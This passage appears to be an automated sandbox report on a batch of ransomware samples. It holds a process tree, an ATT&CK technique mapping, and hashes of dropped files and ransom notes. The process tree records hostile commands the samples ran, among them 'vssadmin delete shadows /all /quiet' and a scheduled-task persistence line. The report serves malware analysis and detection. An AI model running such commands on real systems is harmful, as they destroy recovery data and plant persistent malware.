                    • Interacts with shadow copies
                    PID:4056
                • C:\Windows\System32\mshta.exe
                  "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                  4⤵
                  • Modifies Internet Explorer settings
                  PID:4708
                • C:\Windows\System32\mshta.exe
                  "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                  4⤵
                  • Modifies Internet Explorer settings
                  PID:756
              • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crypren.acmd-082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76.exe
                Trojan-Ransom.Win32.Crypren.acmd-082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76.exe
                3⤵
                • Drops startup file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2580
              • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Foreign.nyqu-bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c.exe
                Trojan-Ransom.Win32.Foreign.nyqu-bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c.exe
                3⤵
                • Drops startup file
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1692
              • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
                Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of WriteProcessMemory
                PID:2740
                • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
                  "C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe" g
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:568
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1652
                • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                  "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Enumerates connected drives
                  • Sets desktop wallpaper using registry
                  • System Location Discovery: System Language Discovery
                  • Modifies Control Panel
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:1788
                  • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                    "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:3532
                  • C:\Windows\SysWOW64\vssadmin.exe
                    "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Interacts with shadow copies
                    PID:1260
                  • C:\Windows\SysWOW64\vssadmin.exe
                    "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Interacts with shadow copies
                    PID:4612
                  • C:\Windows\SysWOW64\vssadmin.exe
                    "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Interacts with shadow copies
                    PID:596
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    PID:2664
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3188
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config252888.bat"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:908
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 2
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:3184
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /4
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2696
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILES ENCRYPTED.txt
              2⤵
                PID:4316
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2448
            • C:\Windows\SysWOW64\DllHost.exe
              C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
              1⤵
              • System Location Discovery: System Language Discovery
              PID:4244

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Windows Management Instrumentation

            1
            T1047

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Defense Evasion

            Direct Volume Access

            1
            T1006

            Indicator Removal

            2
            T1070

            File Deletion

            2
            T1070.004

            Modify Registry

            3
            T1112

            Virtualization/Sandbox Evasion

            1
            T1497

            Credential Access

            Credentials from Password Stores

            2
            T1555

            Credentials from Web Browsers

            1
            T1555.003

            Windows Credential Manager

            1
            T1555.004

            Unsecured Credentials

            1
            T1552

            Credentials In Files

            1
            T1552.001

            Discovery

            Browser Information Discovery

            1
            T1217

            Network Service Discovery

            2
            T1046

            Peripheral Device Discovery

            2
            T1120

            Query Registry

            5
            T1012

            Remote System Discovery

            1
            T1018

            System Information Discovery

            5
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            System Network Configuration Discovery

            1
            T1016

            Internet Connection Discovery

            1
            T1016.001

            Virtualization/Sandbox Evasion

            1
            T1497

            Lateral Movement

            Collection

            Data from Local System

            1
            T1005

            Command and Control

            Exfiltration

            Impact

            Defacement

            1
            T1491

            Inhibit System Recovery

            2
            T1490

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab.id-2FA84094.[[email protected]].arena
              Filesize

              23.5MB

              MD5

              c113065c025c3f5052fc44118477b4ce

              SHA1

              d59147bd75a05fdd34b36fd1920f59d8f6490786

              SHA256

              ba96cdfe51b885d1c0b0d3b24257701db6b06dbf60fd892dabe90e0d3182a594

              SHA512

              27a5d761889fc62d1ed0d7f5c19f9067222fce336b5c2fa9e782a55f1ae18d8a2ed094208b6c284b7ca546aa0ccb46ae7f06d3890713ec8226f35b1c1b48ee17

              Download Submit

            • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
              Filesize

              13KB

              MD5

              b97891fffcc8b87fda8b4e2a0827b715

              SHA1

              9328a8763fb71586219f1f675213f092b776719d

              SHA256

              677eaea55f6fb6f64a7d116ff8357d49c5fdc3411dbc6dbb36ecb35ca5be4f08

              SHA512

              7f08e5642b144ca3f8f26c92a5f61fe57591b08c11d527f96d159f4c75f24b13782752cb66df2862cda766a3b276ea258bcfd5e04fdf8f3ce3684bc4feaf78bf

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__config252888.bat
              Filesize

              212B

              MD5

              acce7e052ad182cab0096b2506c84893

              SHA1

              051ab4bd1f38e447e48704907b2f30c89c5de6a3

              SHA256

              0668e7fd81715c71f8f83935f562cc1fbeb49a84bcf2e396215b8b336ee91a3b

              SHA512

              1fd09c0ecbe093944fcd5b139aba159a2392887e7eb48db0b821bc5b494f8abd9908a47c906d6b590cfa8227fa3ee7205c16ff06ed64d280530fc114d2d4415a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\f1.vbs
              Filesize

              3KB

              MD5

              37219fd2d09abee4189a1ae33de93e2d

              SHA1

              5e4cc26e169b6bd16843bcc86806556dac372c57

              SHA256

              2a0d2418a2504ad14960dcff54f0892339eeed53e359585c9b04a29c4e6e4274

              SHA512

              626b89eb5b132ac43a6fb2d5dcc1c62349a6a48045a486835aa51c17348b0c4849cf5d56b4b56359c7bab5bdccaa04adf659f7486de84f9c14d86032272e5069

              Download Submit

            • C:\Users\Admin\AppData\Roaming\YI89EL.exe
              Filesize

              575KB

              MD5

              67672448d587eaed5a23ee152d56c58a

              SHA1

              5d420fc8fcd41832077dd750273b3cb870f4f811

              SHA256

              48f187fa619bf8072f809aa32f1734115c03f14027d5fdcca6aed8d97c81f662

              SHA512

              707d3bfb257ad3ce68c522756bcafd26ebc73415ea2cd8cc242aaf90ca62833af002d0dd51189c14964cef0e1e5f895a2ab5c2ca8a002857927239539f046508

              Download Submit

            • C:\Users\Admin\AppData\Roaming\s1qoaKDO.tmp
              Filesize

              72B

              MD5

              14a86b880d088d1d8e9e8a0ba1ffb0cb

              SHA1

              48fb8664a7cab9a7197f8ef8860ac53ba2c0a9fc

              SHA256

              5ea477113fe4736cd9ef3181f26b4c0bea5080a688560dbd8ea329d5a30acd1d

              SHA512

              6a9b4dd718566fd7b6ad3377348ac3521d3d2c9ca4e8c8d875d1b084075c101064c8c4df56f1591a53934368990ecf58a518dfc2e3dc33b8f1b609db13f9e0e0

              Download Submit

            • C:\Users\Admin\Desktop\!HELP_SOS.hta
              Filesize

              64KB

              MD5

              50564fa3e6b3d467823f55204ba66039

              SHA1

              81c470e03dd7b72867be4c410bd8ed10a03ba65c

              SHA256

              6c7797ebf9837aad97c9ea7f844d2ca38babbb31264d500135869d80a6b305a6

              SHA512

              41a282751c3c47253650ce69558e7782edbf87df6390e6dffc42a4afb39cb5b316068b58beb773b191597233ad41dd20b9a5d27638e1765c700c95634d9e7ff0

              Download Submit

            • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
              Filesize

              851KB

              MD5

              d31d884ad7acf8ba3e88ec303758f4e7

              SHA1

              da7cc352643a09a3a8a0ea61844e968df63b04fd

              SHA256

              e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030

              SHA512

              4c50bd466cab12b64a876352f938fd3604aa7ff83bc1efbcb62e7f3d0b0e833f4988b29ed7fecad736e9093a9fac796296a21c55448ea54ea5458021f79788a0

              Download Submit

            • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b.exe
              Filesize

              180KB

              MD5

              07c90ef39804b2f0ec6950b947defdb7

              SHA1

              f9f987c58a174a6f19c4bfaace3f1c79bad5a638

              SHA256

              a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b

              SHA512

              beba4fc429542002d0f88851089bbd1e130b05189c3616307fe3d7999dccdf36c7c55450d116c4c33ef4496d658faa93d30806a1a1e4df7215d215f0a501b5fa

              Download Submit

            • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
              Filesize

              135KB

              MD5

              d3520267e15a2bec32b6ea456ff8a729

              SHA1

              54ead93e2cf5269344dc5300d2a645260e7cc26d

              SHA256

              57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850

              SHA512

              97871cc16a3ae9fc261137dd193456f5e822983303db47d6d29f26d763490aa74594625a81d6a443b874cb73c2c3cd2e8a3fffe6d42b20b5b3a9ca178a4eae7c

              Download Submit

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.meia-b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6.exe
              Filesize

              63KB

              MD5

              cdf5bba313fecd7d8f057085aedc7102

              SHA1

              c4540f5be820ec3da14b0e4f3165c2e325cc33b3

              SHA256

              b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6

              SHA512

              053d0042619232e8d10ee40e764dcd38595592320f0a8bdbc74c31aeccd4a21929e785b105c6b285194e0cd824e2775ae31ff58bca4383d58708c21c15c30cfe

              Download Submit

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
              Filesize

              702KB

              MD5

              d614a3d0af87ce7406abd323227c7578

              SHA1

              a7d038e6e09ec8aaa44b2bfb091255301fa1bc66

              SHA256

              6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225

              SHA512

              cc839d31101d25fb2777ca29b87a591111f4712aeb474bf5de072d97db2d4ca7fe513f0f292aab972a300be34ecaa423579df12bd5a267eb07217dfd85f0b1ae

              Download Submit

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crusis.to-153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d.exe
              Filesize

              92KB

              MD5

              26bd8a37e289236f7f3508ae5969649c

              SHA1

              87576661fc5cd7f77e690a10b7f6117b053344bb

              SHA256

              153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d

              SHA512

              8a27314a1c9422ffdbfdc497d1f1d6decdbd951b73bf812d95ec15a971da7f61caeff6faef93f8e6a884f6014559ea2576fee4a42e2132cca3e9629f8aed1cf4

              Download Submit

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crypren.acmd-082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76.exe
              Filesize

              799KB

              MD5

              f6a8d7a4291c55020101d046371a8bda

              SHA1

              09b08e04ee85b26ba5297cf3156653909671da90

              SHA256

              082060e3320870d1d576083e0ee65c06a1104913ae866137f8ca45891c059a76

              SHA512

              547ad8ac404e494cce474209ebfbe33a40b69feb59f564215622f479e98dd93699794f4950b05d21225af271c55987da24c68d7c4c172f1d99ba7050b7063888

              Download Submit

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Foreign.nyqu-bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c.exe
              Filesize

              952KB

              MD5

              caf27d615c9cf39b31442ef0c472e97c

              SHA1

              20e22c952f70706559efe57e1eec289ea89690fa

              SHA256

              bd0779aa969bad2a16ffc1b81e6e418668f332cd79209a8acd93ac9f4decb35c

              SHA512

              bf6b53a54912b31025e023955a3ec2ec1ca32f9f04c2544a4c7e1f6591943e315fa84a979b11a28a48a6ec04eeadd89ff243dde1693b6d71f13d6a1d1f2a549e

              Download Submit

            • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.SageCrypt.amf-052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f.exe
              Filesize

              286KB

              MD5

              05b7e80b215578e2c737549925daef10

              SHA1

              d9e5cb291cda27026b696980e4d5a77cf878386b

              SHA256

              052b509cce1ce84abc2be8ac481e847470fc2cee8da98a2dd84a3b0bc85ca06f

              SHA512

              4219da6bf750cc09f515c058eac16cbdc90f7c506d94309b842a8639a458a14bb6b39a592f346b02ce86b98828d081f609580fe82d2847df800330ff2c393106

              Download Submit

            • C:\Users\Admin\Desktop\FILES ENCRYPTED.txt
              Filesize

              172B

              MD5

              bfd68b480d75505dd76cddbe66a785bc

              SHA1

              3f5618ea508b40d9020556b4736abaa4da283b07

              SHA256

              af4e1740143e8a58b2cb145f17f6f5810156ddd4a15138e7b544cac9122e64af

              SHA512

              76ccc51ecb90426df106b4689cc028052bb6294ad9e7c45b673161e6f29ac13e5479e25ad5304806bf38314aad348f9b551647e771558c09c4315cfba674d0f4

              Download Submit

            • C:\Users\Admin\Desktop\LimitTrace.xlsx.ENCRYPTED
              Filesize

              9KB

              MD5

              b2a92418da0acd77919f4c2cca5a34af

              SHA1

              1cdc3a150ef60a745d76187bcc1e4d4ca250bbb4

              SHA256

              eede59d414a00de42531928ebe56ebd6b90dd5d78f7c62e8098ce00a036a0664

              SHA512

              8ab7110772bac7f6474ae37851dbf57034a7314c879cb44c1148126ec783fd971ef828f8c6e3435e432d17a92142345f6aa0d431a89b900a654185cf6397f540

              Download Submit

            • C:\Users\Admin\Documents\READ_THIS_TO_DECRYPT.html
              Filesize

              1KB

              MD5

              55764b80badcdfe4337f538993fc3aab

              SHA1

              049ebb79ca8e78a30318d9eef6b37992572e1034

              SHA256

              a53779746a2aec49c361f546b70a74508aac83c9ea8203af07f142abfa251b35

              SHA512

              b8a94d01ad1ca07fd08a890a5b55b71d97d0fc3df705704812c18993872d1ed7360aea6a5fb7e388fd8cedbc2baa7cfabf4207f59becee2927aa1030fa60689b

              Download Submit

            • memory/568-3666-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/568-164-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/568-199-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/756-20419-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1280-156-0x0000000000400000-0x00000000004DD000-memory.dmp

              Filesize

              884KB

              Download

            • memory/1328-20507-0x0000000000400000-0x0000000000498000-memory.dmp

              Filesize

              608KB

              Download

            • memory/1480-1101-0x00000000011A0000-0x00000000011B3000-memory.dmp

              Filesize

              76KB

              Download

            • memory/1692-8338-0x0000000000400000-0x00000000004F5000-memory.dmp

              Filesize

              980KB

              Download

            • memory/1692-20389-0x0000000000400000-0x00000000004F5000-memory.dmp

              Filesize

              980KB

              Download

            • memory/1788-3543-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/1788-20535-0x0000000002F70000-0x0000000002F80000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1788-4107-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/1788-20482-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/1788-20390-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/1788-14320-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/1788-8489-0x0000000002F70000-0x0000000002F80000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1792-26-0x00000000000E0000-0x00000000000F6000-memory.dmp

              Filesize

              88KB

              Download

            • memory/2696-20495-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20456-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-9643-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-9710-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20487-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20486-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20485-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20484-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20491-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20479-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20477-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20488-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20455-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20492-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20498-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20496-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-19-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-18-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-20497-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-17591-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-17564-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-18830-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2696-18828-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2740-189-0x0000000002FB0000-0x0000000002FC0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2740-159-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/2740-3508-0x0000000002960000-0x00000000029AE000-memory.dmp

              Filesize

              312KB

              Download

            • memory/2740-47-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/2740-3592-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/2912-220-0x0000000000080000-0x0000000000093000-memory.dmp

              Filesize

              76KB

              Download

            • memory/2912-9936-0x0000000000080000-0x0000000000093000-memory.dmp

              Filesize

              76KB

              Download

            • memory/3016-35-0x0000000000400000-0x0000000000412000-memory.dmp

              Filesize

              72KB

              Download

            • memory/3016-32-0x0000000000400000-0x0000000000412000-memory.dmp

              Filesize

              72KB

              Download

            • memory/3016-46-0x0000000000400000-0x0000000000412000-memory.dmp

              Filesize

              72KB

              Download

            • memory/3024-8317-0x0000000000400000-0x00000000004BC000-memory.dmp

              Filesize

              752KB

              Download

            • memory/3024-13042-0x0000000000400000-0x00000000004BC000-memory.dmp

              Filesize

              752KB

              Download

            • memory/3532-14321-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/3532-4137-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/3532-4316-0x0000000000400000-0x000000000044E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/3952-13031-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13331-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13039-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13037-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13035-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13033-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-20391-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13029-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13328-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13044-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-20499-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13330-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/3952-13329-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/4072-20519-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4072-20517-0x0000000000020000-0x0000000000021000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4072-20520-0x00000000004C0000-0x000000000058E000-memory.dmp

              Filesize

              824KB

              Download

            • memory/4708-20471-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmp

              Filesize

              64KB

              Download